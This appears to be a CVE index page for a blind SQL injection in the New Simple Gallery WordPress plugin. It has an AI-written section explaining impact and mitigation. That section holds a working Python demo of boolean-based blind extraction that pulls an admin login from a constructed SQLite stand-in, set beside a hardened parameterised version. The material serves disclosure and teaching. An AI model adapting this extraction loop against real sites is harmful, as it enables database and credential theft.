CVE-2025-58881
Description
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in gopiplus New Simple Gallery (plugin slug: new-simple-gallery) allows Blind SQL Injection. This issue affects New Simple Gallery: from n/a through 8.0.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Blind SQL injection in the New Simple Gallery WordPress plugin (versions through 8.0) lets an attacker infer and extract database contents through crafted input; the public description does not name the affected endpoint or the privilege level needed to reach it.
Vulnerability
Overview
The New Simple Gallery plugin for WordPress, versions up to and including 8.0, contains a blind SQL injection vulnerability (CWE-89). User-supplied input reaches an SQL statement without being neutralized, i.e. it is incorporated into the query text rather than being validated and bound as a parameter, so SQL syntax in the input is executed by the database [1].
Exploitation
The description does not identify the vulnerable endpoint or parameter, nor the privilege level required to reach it, so the access needed should be treated as unknown rather than assumed to be unauthenticated. Because the injection is blind, the attacker gets neither query output nor error text back. Each request instead answers one yes/no question, either through a difference in the response (boolean-based) or through an induced delay (time-based, for example SLEEP() on MySQL), and the database contents are rebuilt one bit or one character at a time across many requests [1].
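The boolean-based inference described above, carried through end to end against a constructed stand-in, as an added example that is not code from the New Simple Gallery plugin or from gopiplus. The handler names, the `gallery_id` parameter, the gallery id 7, the table layout and the rows are all assumptions made for illustration; SQLite stands in for MySQL (SQLite's `unicode()` plays the role MySQL's `ORD()`/`ASCII()` would). The vulnerable handler shows the string concatenation the CWE describes, the hardened handler casts the input to an integer and binds it, which is what `$wpdb->prepare()` with `%d` does in a WordPress plugin, and the same extraction loop is run against both:

```python
import sqlite3


def build_db():
    """Constructed stand-in database (not the plugin's schema): a gallery table
    plus a cut-down wp_users table holding the secret we will extract."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT)")
    conn.execute("CREATE TABLE gallery_items (id INTEGER PRIMARY KEY, gallery_id INTEGER, title TEXT)")
    conn.executemany("INSERT INTO wp_users VALUES (?, ?, ?)",
                     [(1, "admin", "$P$Bconstructed.hash"), (2, "editor", "$P$Banother.hash")])
    conn.executemany("INSERT INTO gallery_items VALUES (?, ?, ?)",
                     [(1, 7, "Sunset"), (2, 7, "Beach"), (3, 8, "Mountains")])
    return conn


def vulnerable_handler(conn, gallery_id):
    """Hypothetical request handler showing the CWE-89 pattern: the request
    parameter is concatenated into the statement, so SQL inside it is executed."""
    sql = "SELECT title FROM gallery_items WHERE gallery_id = " + gallery_id
    return [row[0] for row in conn.execute(sql)]


def hardened_handler(conn, gallery_id):
    """Same lookup with the input cast to an integer and bound as a parameter
    (the equivalent of $wpdb->prepare() with %d in a WordPress plugin)."""
    try:
        gid = int(gallery_id)
    except ValueError:
        return []          # non-numeric input is rejected, never interpreted as SQL
    sql = "SELECT title FROM gallery_items WHERE gallery_id = ?"
    return [row[0] for row in conn.execute(sql, (gid,))]


def extract_string(handler, conn, subquery, max_len=64):
    """Boolean-based blind extraction of the value returned by `subquery`.

    Each request asks one yes/no question: the injected condition is ANDed onto
    a gallery id known to have rows (7 here), so the response contains rows only
    when the condition is true.  Characters are recovered with a binary search
    over the ASCII range, 7 requests per character plus one length probe.
    Returns (recovered_value, number_of_requests).
    """
    requests = 0

    def ask(condition):
        nonlocal requests
        requests += 1
        return len(handler(conn, f"7 AND ({condition})")) > 0

    value = ""
    for pos in range(1, max_len + 1):
        # length probe: is there a character at this position at all?
        if not ask(f"length(({subquery})) >= {pos}"):
            break
        lo, hi = 0, 127            # invariant: the code point lies in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        value += chr(lo)
    return value, requests


if __name__ == "__main__":
    db = build_db()
    target = "SELECT user_login FROM wp_users WHERE ID = 1"
    print("vulnerable:", extract_string(vulnerable_handler, db, target))
    print("hardened:  ", extract_string(hardened_handler, db, target))
```

Against the vulnerable handler the loop recovers the admin login in 41 requests (five characters at eight requests each plus the final failed length probe); against the hardened handler the first probe already returns no rows, so nothing is recovered. A time-based variant replaces the row-count check with a measured delay and otherwise uses the same loop, which is why request volume, not error messages, is the detection signal for this class of attack.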
Impact
Successful exploitation lets the attacker read data from the WordPress database through the injected queries. On a standard installation that includes the wp_users table (logins and password hashes) and wp_usermeta (which holds session tokens and role assignments), so the practical outcome is credential theft, privilege escalation to an administrator account and, from there, full compromise of the site and follow-on attacks against its users [1].
Mitigation
No patched version is recorded in this index. Check the plugin's changelog for a release newer than 8.0 that addresses the issue and update as soon as one is available. Until then, deactivate and remove the plugin: a reachable blind injection needs nothing more than a scripted loop of HTTP requests to exploit, and publicly known plugin SQL injections are routinely scanned for at scale, so prompt action matters [1].
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products (1)
New Simple Gallery (new-simple-gallery): versions <= 8.0
Patches (0)
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References (1)
News mentions (0)
No linked articles in our index yet.